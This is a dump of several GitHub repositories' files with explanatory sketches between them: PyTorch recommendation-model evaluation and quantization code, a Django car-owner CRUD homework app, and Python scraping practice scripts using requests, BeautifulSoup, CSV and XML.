device='cuda')\n\n with torch.no_grad():\n list_ = list(enumerate(zip(data.test_users, data.test_items)))\n for i, (u,n) in tqdm(list_):\n res = model(u.cuda().view(-1), n.cuda().view(-1), 
sigmoid=True).detach().view(-1, data.samples_per_user)\n # set duplicate results for the same item to -1 before topk\n res[data.dup_mask[i]] = -1\n out = torch.topk(res, data.K)[1]\n # topk in pytorch is stable(if not sort)\n # key(item):value(predicetion) pairs are ordered as original key(item) order\n # so we need the first position of real item(stored in real_indices) to check if it is in topk\n ifzero = (out == data.real_indices[i].cuda().view(-1,1))\n hits_ = ifzero.sum()\n ndcg_ = (log_2 / (torch.nonzero(ifzero)[:,1].view(-1).to(torch.float)+2).log_()).sum()\n hits += hits_\n ndcg += ndcg_\n\n hits = hits.item()\n ndcg = ndcg.item()\n\n return hits / data.num_user, ndcg / data.num_user\n\n\ndef main():\n args = parse_args()\n\n if args.seed is not None:\n print(\"Using seed = {}\".format(args.seed))\n torch.manual_seed(args.seed)\n np.random.seed(seed=args.seed)\n\n # Check that GPUs are actually available\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n # Create model\n model = NeuMF(2197225, 855776,\n mf_dim=64, mf_reg=0.,\n mlp_layer_sizes=[256, 256, 128, 64],\n mlp_layer_regs=[0. for i in [256, 256, 128, 64]])\n\n print(model)\n\n if use_cuda:\n # Move model and loss to GPU\n model = model.cuda()\n\n if args.load_ckp:\n ckp = torch.load(args.load_ckp)\n model.load_state_dict(ckp)\n\n if args.quantize:\n all_embeding = [n for n, m in model.named_modules() if isinstance(m, nn.Embedding)]\n all_linear = [n for n, m in model.named_modules() if isinstance(m, nn.Linear)]\n all_relu = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU)]\n all_relu6 = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU6)]\n # layers = all_relu + all_relu6 + all_linear\n layers = all_embeding\n replacement_factory = {nn.ReLU: ActivationModuleWrapperPost,\n nn.ReLU6: ActivationModuleWrapperPost,\n nn.Linear: ParameterModuleWrapperPost,\n nn.Embedding: ActivationModuleWrapperPost}\n mq = ModelQuantizer(model, args, layers, replacement_factory)\n # mq.log_quantizer_state(ml_logger, -1)\n\n test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user = data_loader(args.data)\n data = NcfData(test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user)\n\n hr, ndcg = val(model, data)\n print('')\n print('')\n print('HR@{K} = {hit_rate:.4f}, NDCG@{K} = {ndcg:.4f}'\n .format(K=K, hit_rate=hr, ndcg=ndcg))\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
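The quantization scripts above pick per-layer clipping values by minimizing a calibration loss with `scipy.optimize.minimize` (Powell method). Below is a minimal, self-contained sketch of that search idea on synthetic data; the 4-bit uniform quantizer and the MSE proxy loss are illustrative stand-ins for the repo's `FixedClipValueQuantization` wrapper and BCE calibration loss, not its actual implementation.

```python
import numpy as np
import scipy.optimize as opt

rng = np.random.default_rng(0)
cal = rng.standard_normal(10_000)  # stand-in calibration activations

def quantize(x, clip, bits=4):
    # Uniform quantization over [-clip, clip] with 2**bits levels.
    clip = max(float(clip), 1e-6)
    step = 2 * clip / (2 ** bits - 1)
    return np.round(np.clip(x, -clip, clip) / step) * step

def calib_loss(c):
    # MSE between float and quantized values, a cheap proxy for task loss.
    return float(np.mean((cal - quantize(cal, np.atleast_1d(c)[0])) ** 2))

init = float(np.abs(cal).max())  # 'max_static'-style initialization
res = opt.minimize(calib_loss, x0=[init], method="Powell")
print(f"init clip={init:.3f}  loss={calib_loss(init):.5f}")
print(f"opt  clip={res.x.item():.3f}  loss={res.fun:.5f}")
```

Powell is a sensible choice in this setting because each loss evaluation is cheap but the rounding step makes the objective non-differentiable.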
true-datura/Django_view_and_templates_hw | https://github.com/true-datura/Django_view_and_templates_hw | 198889c362da0b5a6ee6b55c9363780e79a60845 | 0adcafb093611bcc56d26bfeeaf546592f582a54 | c9e3bb6b32ef0310ce9b127f1670f0c4c15eb8f3 | refs/heads/master | 2016-09-23T05:59:25.223486 | 2016-08-04T10:05:18 | 2016-08-04T10:05:18 | 64,746,622 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6278825998306274,
"alphanum_fraction": 0.6289308071136475,
"avg_line_length": 30.799999237060547,
"blob_id": "11092fd2e09a07daad285200aa210e8942b9de9f",
"content_id": "a9e96e8e3ff5c6265426b5231569f07775b6780a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 954,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 30,
"path": "/dj_views_and_tmps/cars/admin.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Owner, Engine, Manufacturer, Car, Car_Owner\n\n\nclass Car_OwnerInline(admin.TabularInline):\n model = Car_Owner\n extra = 1\n\n\[email protected](Owner)\nclass OwnerAdmin(admin.ModelAdmin):\n inlines = (Car_OwnerInline,)\n list_display = ('name', 'surname', 'age', 'gender')\n empty_value_display = 'Empty'\n fields = ('name', 'surname', 'age', 'gender',)\n\n\[email protected](Car)\nclass CarAdmin(admin.ModelAdmin):\n inlines = (Car_OwnerInline,)\n list_display = ['id', 'engine', 'manufacturer', 'color', 'build_date',]\n date_hierarchy = 'build_date'\n list_display_links = ('id',)\n list_editable = ('color', 'engine', 'manufacturer',)\n list_filter = ('build_date', )\n search_fields = ('color',)\n # fields = ('engine', 'manufacturer', 'color', 'seats_num',)\n fieldsets = (\n ('Options', {'fields': ('engine', 'manufacturer', 'color', 'seats_num', 'mileage',)}),\n )\n"
},
{
"alpha_fraction": 0.6124546527862549,
"alphanum_fraction": 0.6130592226982117,
"avg_line_length": 24.84375,
"blob_id": "11f38105ca661dd21416c15ee9873e806d591759",
"content_id": "6f02a6741a10b118ef86f67cff8acc46e19072e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1654,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 64,
"path": "/dj_views_and_tmps/cars/views.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.core.urlresolvers import reverse_lazy\nfrom django.db.models import Q\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\n\nfrom cars.models import Owner\n\n\nclass OwnerDetailView(DetailView):\n model = Owner\n\n def get_context_data(self, **kwargs):\n context = super(OwnerDetailView, self).get_context_data(**kwargs)\n return context\n\n\nclass OwnerListView(ListView):\n model = Owner\n paginate_by = 5\n\n def get_context_data(self, **kwargs):\n context = super(OwnerListView, self).get_context_data(**kwargs)\n return context\n\n def get_queryset(self):\n owners = Owner.objects.all()\n query = self.request.GET.get('query')\n if query:\n owners = Owner.objects.filter(Q(name__contains=query) | Q(surname__contains=query)\n | Q(gender__contains=query))\n sort_by = self.request.GET.get('by')\n if sort_by:\n sort_by = self.request.GET.get('in') + sort_by.lower()\n owners = Owner.objects.order_by(sort_by)\n return owners\n\n\nclass OwnerCreateView(CreateView):\n model = Owner\n fields = (\n 'name',\n 'surname',\n 'age',\n 'gender',\n 'photo',\n )\n\n\nclass OwnerUpdateView(UpdateView):\n model = Owner\n fields = (\n 'name',\n 'surname',\n 'age',\n 'gender',\n 'photo',\n )\n template_name_suffix = '_update_form'\n\n\nclass OwnerDeleteView(DeleteView):\n model = Owner\n success_url = reverse_lazy('owner_list')\n"
},
{
"alpha_fraction": 0.6415841579437256,
"alphanum_fraction": 0.6415841579437256,
"avg_line_length": 44.90909194946289,
"blob_id": "3c73dabcbc0a7597375f69e18b67ed02fbea27f8",
"content_id": "32c9e701ff74c9ec112a1923996e11a8b9b9bf28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 11,
"path": "/dj_views_and_tmps/cars/urls.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\n\nfrom cars import views\n\nurlpatterns = [\n url(r'^$', views.OwnerListView.as_view(), name='owner_list'),\n url(r'^(?P<pk>\\d+)/$', views.OwnerDetailView.as_view(), name='owner_detail'),\n url(r'^create/$', views.OwnerCreateView.as_view(success_url=\"/\"), name='owner_create'),\n url(r'^(?P<pk>\\d+)/edit/$', views.OwnerUpdateView.as_view(), name='owner_edit'),\n url(r'^(?P<pk>\\d+)/delete/$', views.OwnerDeleteView.as_view(success_url=\"/\"), name='owner_delete'),\n]\n"
},
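The `url()` patterns above rely on named regex groups: whatever `(?P<pk>\d+)` captures is handed to the view as the `pk` keyword argument. A quick standalone illustration of that capture with plain `re` (no Django required):

```python
import re

pattern = re.compile(r'^(?P<pk>\d+)/edit/$')
match = pattern.match('42/edit/')
print(match.group('pk'))           # '42' -> becomes the view's pk kwarg
print(pattern.match('abc/edit/'))  # None: a non-numeric pk does not route
```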
{
"alpha_fraction": 0.6157894730567932,
"alphanum_fraction": 0.6192982196807861,
"avg_line_length": 34.6875,
"blob_id": "eed944b2ced80969c9efbb2dac553f4867f1fde8",
"content_id": "e7463d7adaf36726bebcbb0fbf909e2e717da29b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 570,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/dj_views_and_tmps/templates/cars/owner_detail.html",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block title %}\n{{ owner.name }} {{ owner.surname }} details\n{% endblock %}\n{% block content %}\n<h2>Owner details</h2>\n<img src=\"{{ owner.photo.url }}\" class=\"img-responsive img-thumbnail\">\n<hr>\n<p>Name: {{ owner.name }}</p>\n<p>Surname: {{ owner.surname }}</p>\n<p>Age: {{ owner.age }}</p>\n<p>Gender: {{ owner.gender }}</p>\n<a href=\"{{ owner.get_absolute_url }}edit\" class=\"btn btn-primary\">Edit</a>\n<a href=\"{{ owner.get_absolute_url }}delete\" class=\"btn btn-danger\">Delete</a>\n<a href=\"/\" class=\"btn btn-primary\">Main page</a>\n{% endblock %}"
},
{
"alpha_fraction": 0.6593103408813477,
"alphanum_fraction": 0.6710344552993774,
"avg_line_length": 28,
"blob_id": "b770cf2c27ad84eff82e3e6101ee4f15e1b7c213",
"content_id": "303fa230337fc78cae2e7c9077ceafe430889582",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1450,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 50,
"path": "/dj_views_and_tmps/cars/models.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.core.urlresolvers import reverse\n\n\nclass Owner(models.Model):\n name = models.CharField(max_length=200)\n surname = models.CharField(max_length=200)\n age = models.IntegerField()\n gender = models.CharField(max_length=30)\n photo = models.ImageField(upload_to='photos/', default='photos/None/no-img.jpg')\n\n def get_absolute_url(self):\n return reverse('owner_detail', kwargs={'pk': self.pk})\n\n def __str__(self):\n return '%s %s' % (self.name, self.surname)\n\n\nclass Engine(models.Model):\n engine_type = models.CharField(max_length=30)\n capacity = models.FloatField()\n fuel_type = models.CharField(max_length=30)\n\n def __str__(self):\n return '%s engine, fuel: %s' % (self.engine_type, self.fuel_type)\n\n\nclass Manufacturer(models.Model):\n name = models.CharField(max_length=200)\n\n def __str__(self):\n return '%s' % self.name\n\n\nclass Car(models.Model):\n owner = models.ManyToManyField(Owner, through='Car_Owner')\n engine = models.ForeignKey(Engine)\n manufacturer = models.ForeignKey(Manufacturer)\n color = models.CharField(max_length=30)\n seats_num = models.IntegerField()\n build_date = models.DateField()\n mileage = models.IntegerField()\n\n def __str__(self):\n return '%s %s vehicle' % (self.color, self.manufacturer)\n\n\nclass Car_Owner(models.Model):\n owner = models.ForeignKey(Owner)\n car = models.ForeignKey(Car)\n"
},
{
"alpha_fraction": 0.4925650656223297,
"alphanum_fraction": 0.4925650656223297,
"avg_line_length": 24.619047164916992,
"blob_id": "13c9a98b9f666e6b8699707ce1d4c35915af048d",
"content_id": "c68f764dc3c19c909073bc139a89fd5e934f0ba8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 21,
"path": "/dj_views_and_tmps/cars/forms.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm, TextInput\n\nfrom .models import Owner\n\n\nclass CreateOwner(ModelForm):\n class Meta:\n model = Owner\n fields = (\n 'name',\n 'surname',\n 'age',\n 'gender',\n 'photo',\n )\n widgets = {\n 'name': TextInput(attrs={'requred': True}),\n 'surname': TextInput(attrs={'required': True}),\n 'age': TextInput(attrs={'required': True}),\n 'gender': TextInput(attrs={'required': True}),\n }\n"
},
{
"alpha_fraction": 0.5268781185150146,
"alphanum_fraction": 0.5378965139389038,
"avg_line_length": 36.4375,
"blob_id": "57e47481796b2da22a138f978cfd980077e2da8d",
"content_id": "8d1d39ed3a2574cb7eeb3ce0ba1d785dcf1f1490",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2995,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 80,
"path": "/dj_views_and_tmps/cars/migrations/0001_initial.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.8 on 2016-07-31 20:11\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Car',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('color', models.CharField(max_length=30)),\n ('seats_num', models.IntegerField()),\n ('build_date', models.DateField()),\n ('mileage', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='Car_Owner',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('car', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Car')),\n ],\n ),\n migrations.CreateModel(\n name='Engine',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('engine_type', models.CharField(max_length=30)),\n ('capacity', models.FloatField()),\n ('fuel_type', models.CharField(max_length=30)),\n ],\n ),\n migrations.CreateModel(\n name='Manufacturer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Owner',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ('surname', models.CharField(max_length=200)),\n ('age', models.IntegerField()),\n ('gender', models.CharField(max_length=30)),\n ],\n ),\n migrations.AddField(\n model_name='car_owner',\n name='owner',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Owner'),\n ),\n migrations.AddField(\n model_name='car',\n name='engine',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Engine'),\n ),\n migrations.AddField(\n model_name='car',\n name='manufacturer',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Manufacturer'),\n ),\n migrations.AddField(\n model_name='car',\n name='owner',\n field=models.ManyToManyField(through='cars.Car_Owner', to='cars.Owner'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7346938848495483,
"alphanum_fraction": 0.7346938848495483,
"avg_line_length": 23.5,
"blob_id": "222123ee541dedf3d913d51018637c90b6a4f5e1",
"content_id": "7b588bba5510ba33911fab55467e1da84f9491aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 2,
"path": "/README.md",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "Домашнее задание по админке и статике. \nАвраменко Демид.\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.604347825050354,
"avg_line_length": 24.61111068725586,
"blob_id": "e89c53f5cd2219945df357c707266f2b2b4906c5",
"content_id": "e1b3127a158aa4641f2fa9aec82e45af952cb373",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 18,
"path": "/dj_views_and_tmps/templates/cars/owner_update_form.html",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block title %}\nEditing\n{% endblock %}\n{% block content %}\n<h2>Edit object</h2>\n<img src=\"{{ owner.photo.url }}\" class=\"img-responsive img-thumbnail\">\n<hr>\n<form action=\"\" method=\"POST\" enctype=\"multipart/form-data\">\n {% csrf_token %}\n <table>\n {{ form.as_table }}\n </table>\n <br>\n <button type=\"submit\" class=\"btn btn-primary\">Save</button>\n <a href=\"/\" class=\"btn btn-danger\">Cancel</a>\n</form>\n{% endblock %}"
}
] | 9 |
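A runnable sketch of the `Q`-object OR-filter that `OwnerListView.get_queryset` builds, using an in-memory SQLite database via `settings.configure()` so no project scaffolding is needed. It assumes only that Django is installed; the trimmed-down `Owner` model and the `demo` app label here are illustrative, not part of the repo.

```python
import django
from django.conf import settings

settings.configure(
    INSTALLED_APPS=["django.contrib.contenttypes", "django.contrib.auth"],
    DATABASES={"default": {"ENGINE": "django.db.backends.sqlite3",
                           "NAME": ":memory:"}},
)
django.setup()

from django.db import connection, models
from django.db.models import Q

class Owner(models.Model):
    name = models.CharField(max_length=200)
    surname = models.CharField(max_length=200)

    class Meta:
        app_label = "demo"  # hypothetical app label for this standalone demo

    def __str__(self):
        return f"{self.name} {self.surname}"

# Create the table directly instead of running migrations.
with connection.schema_editor() as editor:
    editor.create_model(Owner)

Owner.objects.create(name="Ada", surname="Lovelace")
Owner.objects.create(name="Alan", surname="Turing")

# OR across fields, as in get_queryset()'s search branch.
hits = Owner.objects.filter(Q(name__contains="Ada") | Q(surname__contains="Turing"))
print([str(o) for o in hits])  # ['Ada Lovelace', 'Alan Turing']
```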
biofantasy/pratices-log-blog | https://github.com/biofantasy/pratices-log-blog | 7eced77b61b9bb0cab28599d29146edeb28fba42 | 2081b4c9ad352e614600ed8f00686eff9b5bb2da | 9a225ed5b0c8a36f2bdafd03c2f03730bd8e65ad | refs/heads/master | 2020-06-17T20:45:39.373517 | 2019-07-16T16:54:44 | 2019-07-16T16:54:44 | 196,048,613 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6372548937797546,
"alphanum_fraction": 0.6552287340164185,
"avg_line_length": 28.190475463867188,
"blob_id": "f2c467102d54ba789e33c219cb88bc98de6f343f",
"content_id": "b8db1acd2a92d7fc85f6a7e5212799372d04bcbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 21,
"path": "/crawler/Python/non_utf.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import html5lib\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nresp = requests.get('https://www.ptwxz.com/html/7/7580/')\n##設置查詢網頁編碼 預設為utf-8?\nresp.encoding = 'gbk'\nsoup = BeautifulSoup(resp.text, 'html.parser')\ntitle = soup.find('div', 'title').text.strip()\ncontents = list()\n\nprint('title :', title)\nfor charpter in soup.find_all('a', {'href': re.compile('[0-9]+.html')}):\n contents.append(charpter.text.strip())\n print('charpter :',charpter.text.strip())\n\nwith open(title + '.txt', 'w', encoding='utf-8') as f:\n for content in contents:\n f.write(content)\n f.write('\\n')"
},
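The script above has to force `resp.encoding = 'gbk'` because the site does not declare its charset reliably. When hard-coding is undesirable, `requests` can guess the encoding from the body instead; a small sketch (requires network access, and the host below is just a placeholder):

```python
import requests

resp = requests.get('https://example.com')
print(resp.encoding)            # taken from the Content-Type header; may be wrong
print(resp.apparent_encoding)   # guessed from the body by charset detection
resp.encoding = resp.apparent_encoding  # make resp.text decode with the guess
print(resp.text[:80])
```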
{
"alpha_fraction": 0.6848591566085815,
"alphanum_fraction": 0.6883803009986877,
"avg_line_length": 20.884614944458008,
"blob_id": "622c19da52b4d79393f52833570e89a3976daaa9",
"content_id": "6f72254bfd0cfcddb96cf2223e2395d87b80b4a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 26,
"path": "/crawler/Python/Post/login.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\n\nURL = 'LoginWebAddress'\n\n## 創建 Session 物件\ns = requests.Session()\n\n## 先瀏覽網頁, 取得 crsf token\nresp = s.get(URL)\nsoup = BeautifulSoup(resp.text, 'html5lib')\ncrsf = soup.find('form', id='ajax-login').find('input', 'crsftok')['value']\n\n##傳送表單資料並登入 依照 Form Data 傳送資料建立, 此範例為: crsftok, email, password\nform_data = {\n 'email': 'YourAccount',\n 'password': 'YourPassword',\n 'crsftok': crsf\n}\n\nresp = s.post(URL, data=form_data)\n\n## 登入成功後, 相關資訊皆保留在 session 物件中, 可以直接索取相關網頁資訊\nresp = s.get('UserInfoWebAddress')\n\nprint(resp.text)"
},
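The login above only works because `requests.Session` persists cookies between the GET (which yields the CSRF token) and the POST. A toy demonstration of that persistence against httpbin.org (assumes network access and that the public httpbin instance is reachable):

```python
import requests

s = requests.Session()
# The first request sets a cookie; the Session stores it.
s.get('https://httpbin.org/cookies/set/sessionid/abc123')
print(s.cookies.get('sessionid'))   # 'abc123'

# The second request automatically sends the stored cookie back.
resp = s.get('https://httpbin.org/cookies')
print(resp.json())                  # {'cookies': {'sessionid': 'abc123'}}
```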
{
"alpha_fraction": 0.5890257358551025,
"alphanum_fraction": 0.6030235290527344,
"avg_line_length": 29.169490814208984,
"blob_id": "204cd7080135d569f5302f79c53767b2dd375433",
"content_id": "1b6a7bebf930ccb32dffc94c869273cf0302db1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2002,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 59,
"path": "/crawler/Python/ezprice_to_csv.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import html5lib\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nimport csv\n\ndef write_csv_1(items):\n with open('ezprice.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(('品項', '價格', '商家'))\n for item in items:\n writer.writerow((column for column in item))\n\n##正式寫入檔案前 先寫入 BOM(Byte Order Mark) 檔案頭 (Windows特有 Mac,Linux可能有相容性問題)\ndef write_csv_2(items):\n with open('ezprice.csv', 'wb') as f:\n f.write(b'\\xEF\\xBB\\xBF')## 在檔案頭加上utf-8編碼的 BOM\n with open('ezprice.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(('品項', '價格', '商家'))\n for item in items:\n writer.writerow((column for column in item))\n \ndef read_csv():\n with open('ezprice.csv', 'r', encoding='utf-8') as f:\n reader = csv.DictReader(f)\n for row in reader:\n print(row['品項'], row['價格'], row['商家'])\n\nquery = 'thinkpad'\n##文字與數字相加 : TypeError: can only concatenate str (not \"int\") to str\nlowestPrice = 'lp=15000' \nhighestPrice = 'hp=60000' \n\npage = requests.get('https://ezprice.com.tw/s/' + query + '/?' + lowestPrice +'&'+ highestPrice).text\nsoup = BeautifulSoup(page, 'html5lib')\nitems = list()\n\nfor div in soup.find_all('div', 'search-rst clearfix'):\n item = list()\n item.append(div.h2.a.text.strip()) #商品名稱\n ## 先取得價格字串\n price = div.find('span', 'num').text\n ## 在移除其中非數字部分 (以空白字串取代非0-9的字元)\n price = re.sub(r'[^0-9]', '', price)\n item.append(price)\n ## 若商家區塊存在則取出商家名稱\n if div.find('span', 'platform-name'):\n item.append(div.find('span', 'platform-name').text.strip())\n else:\n item.append('無')\n items.append(item)\n\nprint('共 %d 項產品' %(len(items)))\n\nwrite_csv_1(items)\n\nread_csv()\n \n\n"
},
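`write_csv_2` above builds the UTF-8 BOM by hand so that Excel on Windows detects the encoding. Python's built-in `utf-8-sig` codec writes the same BOM in one step; a minimal sketch:

```python
import csv

with open('bom_demo.csv', 'w', encoding='utf-8-sig', newline='') as f:
    csv.writer(f).writerow(('Item', 'Price', 'Store'))

with open('bom_demo.csv', 'rb') as f:
    print(f.read(3))  # b'\xef\xbb\xbf' -- the BOM was written automatically
```

Reading the file back with `encoding='utf-8-sig'` also strips the BOM, which avoids a stray `\ufeff` in the first header name when using `csv.DictReader`.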
{
"alpha_fraction": 0.6772152185440063,
"alphanum_fraction": 0.6835442781448364,
"avg_line_length": 23.30769157409668,
"blob_id": "7fcea79943251de67115d06383f7fb023d9b2715",
"content_id": "029c4bf59ca92d1406a4c490e46ef082ac076f0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 13,
"path": "/crawler/Python/Xml/read_xml.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import xml.etree.ElementTree as ET\n\ntree = ET.parse('example.xml')\nroot = tree.getroot()\nprint(root.attrib)\ntotal = root.attrib['totalResults']\nmovies = list()\nfor tag in root.findall('result'):\n print(tag.attrib)\n movies.append(tag.attrib['title'])\n\nprint('共', total, '筆資料, 前 10 筆')\nprint('\\n' .join(movies))\n"
},
{
"alpha_fraction": 0.49643221497535706,
"alphanum_fraction": 0.6187563538551331,
"avg_line_length": 38.20000076293945,
"blob_id": "e57a908720902c355f6b0ad3a76dede9df2e2e8e",
"content_id": "e8881b0b9cf64f4f2714889f5c37021665e096ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 25,
"path": "/crawler/Python/Xml/save_xml.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "from xml.etree.ElementTree import Element, SubElement, tostring\nfrom xml.dom import minidom\n\ndata = [\n [\"Iron Man\",\"2008\",\"tt0371746\",\"movie\"],\n [\"Iron Man 3\",\"2013\",\"tt1300854\",\"movie\"],\n [\"Iron Man 2\",\"2010\",\"tt1228705\",\"movie\"],\n [\"The Man in the Iron Mask\",\"1998\",\"tt0120744\",\"movie\"],\n [\"The Man with the Iron Fists\",\"2012\",\"tt1258972\",\"movie\"],\n [\"Tetsuo, the Iron Man\",\"1989\",\"tt0096251\",\"movie\"],\n [\"The Man with the Iron Heart\",\"2017\",\"tt3296908\",\"movie\"],\n [\"The Invincible Iron Man\",\"2007\",\"tt0903135\",\"movie\"],\n [\"Iron Man: Rise of Technovore\",\"2013\",\"tt2654124\",\"movie\"],\n [\"The Man with the Iron Fists 2\",\"2015\",\"tt3625152\",\"movie\",]\n]\n\nroot = Element('root', {'totalResults': '81', 'response': 'True'})\nfor d in data:\n SubElement(root, 'result',\n {'title': d[0], 'year': d[1], 'imdbID': d[2], 'type': d[3]}\n )\n\nraw_str = tostring(root, 'utf-8')\nparsed = minidom.parseString(raw_str)\nprint(parsed.toprettyxml(indent=\" \"))\n\n"
}
] | 5 |
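Since `read_xml.py` above needs an `example.xml` on disk while `save_xml.py` only prints, here is a round trip through `xml.etree.ElementTree` entirely in memory, tying the two together (the element names mirror the OMDb-style `result` tags used above):

```python
import xml.etree.ElementTree as ET

root = ET.Element('root', {'totalResults': '2', 'response': 'True'})
ET.SubElement(root, 'result', {'title': 'Iron Man', 'year': '2008'})
ET.SubElement(root, 'result', {'title': 'Iron Man 2', 'year': '2010'})

raw = ET.tostring(root, 'utf-8')   # serialize ...
parsed = ET.fromstring(raw)        # ... and parse it straight back
print(parsed.attrib['totalResults'])
print([r.attrib['title'] for r in parsed.findall('result')])
```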
tt2615/BC3409-chatbot | https://github.com/tt2615/BC3409-chatbot | 0fb56df7a4c40df290c07aa4f4da8b112914026e | a4ede702842c300f9fc95ccfa44898d5aaecbe99 | c0c95652231d091bf815a2ae9f85472d1f176ec6 | refs/heads/master | 2023-08-08T02:49:41.900943 | 2020-04-13T11:34:46 | 2020-04-13T11:34:46 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6067144870758057,
"alphanum_fraction": 0.6121553182601929,
"avg_line_length": 29.63257598876953,
"blob_id": "cd8fb04a74fecbc3a3320cb6cc3a9673044a68c8",
"content_id": "28611eff0b59a7e0bd3e76f3efd0a81476a881a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16174,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 528,
"path": "/BC3409DEMO/main/query.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
